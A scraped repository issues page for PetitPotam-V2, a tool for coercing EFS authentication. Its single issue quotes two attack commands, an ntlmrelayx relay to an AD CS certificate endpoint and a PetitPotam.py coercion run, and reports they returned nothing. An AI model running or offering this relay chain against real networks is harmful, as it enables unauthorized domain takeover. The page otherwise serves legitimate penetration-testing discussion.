PetitPotam-V2 icon indicating copy to clipboard operation
PetitPotam-V2 copied to clipboard

More EFS coerced authentication method with PetitPotam.py

Results 1 PetitPotam-V2 issues
Sort by recently updated
recently updated
newest added

I try this 2 commands .but nothing receive . impacket-ntlmrelayx -smb2support -t http://KALI_IP/certsrv/certfnsh.asp --adcs --template 'DomainComputers' python3 PetitPotam.py KALI_IP Server_IP

Waiting for response